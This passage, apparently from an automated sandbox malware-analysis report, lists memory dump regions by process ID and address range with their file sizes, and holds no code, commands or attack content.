                                • memory/2192-452-0x0000000004C60000-0x0000000004C61000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2368-388-0x00000000067D2000-0x00000000067D3000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2368-372-0x0000000000000000-mapping.dmp
                                • memory/2368-378-0x00000000067D0000-0x00000000067D1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2428-298-0x0000000000000000-mapping.dmp
                                • memory/2428-315-0x00000000047D2000-0x00000000047D3000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2428-313-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2644-641-0x0000000000000000-mapping.dmp
                                • memory/2808-526-0x0000000007252000-0x0000000007253000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2808-525-0x0000000007250000-0x0000000007251000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2808-516-0x0000000000000000-mapping.dmp
                                • memory/2824-202-0x0000000000400000-0x0000000000405000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/2824-203-0x0000000000410000-0x00000000004BE000-memory.dmp
                                  Filesize

                                  696KB

                                • memory/2824-196-0x000000000040106C-mapping.dmp
                                • memory/2864-159-0x0000000009310000-0x0000000009311000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-133-0x0000000007022000-0x0000000007023000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-169-0x0000000007023000-0x0000000007024000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-503-0x0000000000400000-0x0000000000492000-memory.dmp
                                  Filesize

                                  584KB

                                • memory/2864-147-0x00000000085B0000-0x00000000085B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-135-0x00000000074B0000-0x00000000074B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-494-0x000000000043F877-mapping.dmp
                                • memory/2864-117-0x0000000000000000-mapping.dmp
                                • memory/2864-128-0x0000000007020000-0x0000000007021000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-129-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2864-132-0x0000000007660000-0x0000000007661000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2868-619-0x0000000000000000-mapping.dmp
                                • memory/2948-346-0x0000000007362000-0x0000000007363000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2948-345-0x0000000007360000-0x0000000007361000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2948-332-0x0000000000000000-mapping.dmp
                                • memory/3128-410-0x0000000004AC2000-0x0000000004AC3000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3128-407-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3128-396-0x0000000000000000-mapping.dmp
                                • memory/3396-490-0x0000000000000000-mapping.dmp
                                • memory/3740-580-0x0000000000000000-mapping.dmp
                                • memory/3828-698-0x0000000000000000-mapping.dmp
                                • memory/3884-603-0x0000000000000000-mapping.dmp
                                • memory/3884-700-0x0000000000417A8B-mapping.dmp
                                • memory/3904-254-0x0000000000000000-mapping.dmp
                                • memory/3904-264-0x0000000006932000-0x0000000006933000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3904-263-0x0000000006930000-0x0000000006931000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3932-706-0x000000000041A684-mapping.dmp
                                • memory/3980-674-0x0000000000000000-mapping.dmp
                                • memory/3992-204-0x0000000000000000-mapping.dmp
                                • memory/3992-207-0x0000000000590000-0x0000000000591000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3992-211-0x0000000004F40000-0x0000000004F41000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3992-209-0x00000000053F0000-0x00000000053F1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3992-210-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/3992-212-0x0000000004EF0000-0x00000000053EE000-memory.dmp
                                  Filesize

                                  5.0MB

                                • memory/3996-557-0x000000000043F877-mapping.dmp
                                • memory/3996-559-0x0000000000400000-0x0000000000492000-memory.dmp
                                  Filesize

                                  584KB

                                • memory/4000-328-0x0000000006EA0000-0x0000000006EA1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4000-318-0x0000000000000000-mapping.dmp
                                • memory/4000-330-0x0000000006EA2000-0x0000000006EA3000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4012-463-0x0000000000000000-mapping.dmp
                                • memory/4012-636-0x000000000041A684-mapping.dmp
                                • memory/4012-474-0x0000000004BC2000-0x0000000004BC3000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4012-472-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4024-423-0x0000000006790000-0x0000000006791000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4024-416-0x0000000000000000-mapping.dmp
                                • memory/4024-424-0x0000000006792000-0x0000000006793000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4028-742-0x0000000000000000-mapping.dmp
                                • memory/4036-682-0x0000000000000000-mapping.dmp
                                • memory/4064-560-0x0000000000000000-mapping.dmp
                                • memory/4064-566-0x0000000007320000-0x0000000007321000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4068-518-0x0000000002770000-0x0000000002771000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4068-501-0x0000000000000000-mapping.dmp
                                • memory/4072-200-0x0000000000620000-0x0000000000621000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4072-186-0x0000000000000000-mapping.dmp
                                • memory/4072-201-0x0000000000640000-0x0000000000645000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/4076-387-0x0000000000000000-mapping.dmp
                                • memory/4076-408-0x0000000000BB2000-0x0000000000BB3000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4076-404-0x0000000000BB0000-0x0000000000BB1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4076-531-0x0000000000000000-mapping.dmp
                                • memory/4076-539-0x00000000042A0000-0x00000000042A1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/4076-540-0x00000000042A2000-0x00000000042A3000-memory.dmp
                                  Filesize

                                  4KB